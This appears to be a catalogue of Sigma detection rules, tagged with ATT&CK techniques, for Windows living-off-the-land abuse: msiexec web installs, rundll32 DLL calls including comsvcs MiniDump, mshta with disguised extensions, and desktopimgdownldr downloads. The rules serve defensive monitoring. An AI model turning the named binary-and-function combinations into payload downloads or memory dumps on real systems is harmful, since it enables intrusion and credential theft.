Techniques
Sample rules
Suspicious Desktopimgdownldr Target File
- source: sigma
- technicques:
- t1105
Description
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Detection logic
condition: selection and not filter1 and not filter2
filter1:
TargetFilename|contains: C:\Windows\
filter2:
TargetFilename|contains:
- .jpg
- .jpeg
- .png
selection:
Image|endswith: \svchost.exe
TargetFilename|contains: \Personalization\LockScreenImage\
Suspicious RASdial Activity
- source: sigma
- technicques:
- t1059
Description
Detects suspicious process related to rasdial.exe
Detection logic
condition: selection
selection:
Image|endswith: rasdial.exe
MsiExec Web Install
- source: sigma
- technicques:
- t1105
- t1218
- t1218.007
Description
Detects suspicious msiexec process starts with web addresses as parameter
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- ' msiexec'
- ://
Potentially Suspicious Rundll32 Activity
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_parent_cpl:
CommandLine|contains|all:
- Shell32.dll
- Control_RunDLL
- .cpl
ParentCommandLine|contains: .cpl
ParentImage: C:\Windows\System32\control.exe
filter_main_screensaver:
CommandLine|contains: shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver
filter_main_startmenu:
CommandLine|endswith: .cpl",
CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL
"C:\Windows\System32\'
ParentImage: C:\Windows\System32\control.exe
selection:
- CommandLine|contains|all:
- 'javascript:'
- .RegisterXLL
- CommandLine|contains|all:
- url.dll
- OpenURL
- CommandLine|contains|all:
- url.dll
- OpenURLA
- CommandLine|contains|all:
- url.dll
- FileProtocolHandler
- CommandLine|contains|all:
- zipfldr.dll
- RouteTheCall
- CommandLine|contains|all:
- shell32.dll
- Control_RunDLL
- CommandLine|contains|all:
- shell32.dll
- ShellExec_RunDLL
- CommandLine|contains|all:
- mshtml.dll
- PrintHTML
- CommandLine|contains|all:
- advpack.dll
- LaunchINFSection
- CommandLine|contains|all:
- advpack.dll
- RegisterOCX
- CommandLine|contains|all:
- ieadvpack.dll
- LaunchINFSection
- CommandLine|contains|all:
- ieadvpack.dll
- RegisterOCX
- CommandLine|contains|all:
- ieframe.dll
- OpenURL
- CommandLine|contains|all:
- shdocvw.dll
- OpenURL
- CommandLine|contains|all:
- syssetup.dll
- SetupInfObjectInstallAction
- CommandLine|contains|all:
- setupapi.dll
- InstallHinfSection
- CommandLine|contains|all:
- pcwutl.dll
- LaunchApplication
- CommandLine|contains|all:
- dfshim.dll
- ShOpenVerbApplication
- CommandLine|contains|all:
- dfshim.dll
- ShOpenVerbShortcut
- CommandLine|contains|all:
- scrobj.dll
- GenerateTypeLib
- http
- CommandLine|contains|all:
- shimgvw.dll
- ImageView_Fullscreen
- http
- CommandLine|contains|all:
- comsvcs.dll
- MiniDump
Suspicious Desktopimgdownldr Command
- source: sigma
- technicques:
- t1105
Description
Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
Detection logic
condition: ( selection1 and not selection1_filter ) or selection_reg
selection1:
CommandLine|contains: ' /lockscreenurl:'
selection1_filter:
CommandLine|contains:
- .jpg
- .jpeg
- .png
selection_reg:
CommandLine|contains|all:
- reg delete
- \PersonalizationCSP
Suspicious Process Start Locations
- source: sigma
- technicques:
- t1036
Description
Detects suspicious process run from unusual locations
Detection logic
condition: selection
selection:
- Image|contains:
- :\RECYCLER\
- :\SystemVolumeInformation\
- Image|startswith:
- C:\Windows\Tasks\
- C:\Windows\debug\
- C:\Windows\fonts\
- C:\Windows\help\
- C:\Windows\drivers\
- C:\Windows\addins\
- C:\Windows\cursors\
- C:\Windows\system32\tasks\
Network Reconnaissance Activity
- source: sigma
- technicques:
- t1082
- t1087
Description
Detects a set of suspicious network related commands often used in recon stages
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- nslookup
- _ldap._tcp.dc._msdcs.
MSHTA Execution with Suspicious File Extensions
- source: sigma
- technicques:
- t1059
- t1059.007
- t1140
- t1218
- t1218.005
Description
Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content, such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- .7z
- .avi
- .bat
- .bmp
- .conf
- .csv
- .dll
- .doc
- .gif
- .gz
- .ini
- .jpe
- .jpg
- .json
- .lnk
- .log
- .mkv
- .mp3
- .mp4
- .pdf
- .png
- .ppt
- .rar
- .rtf
- .svg
- .tar
- .tmp
- .txt
- .xls
- .xml
- .yaml
- .yml
- .zip
- vbscript
selection_img:
- Image|endswith: \mshta.exe
- OriginalFileName: mshta.exe
Sysprep on AppData Folder
- source: sigma
- technicques:
- t1059
Description
Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)
Detection logic
condition: selection
selection:
CommandLine|contains: \AppData\
Image|endswith: \sysprep.exe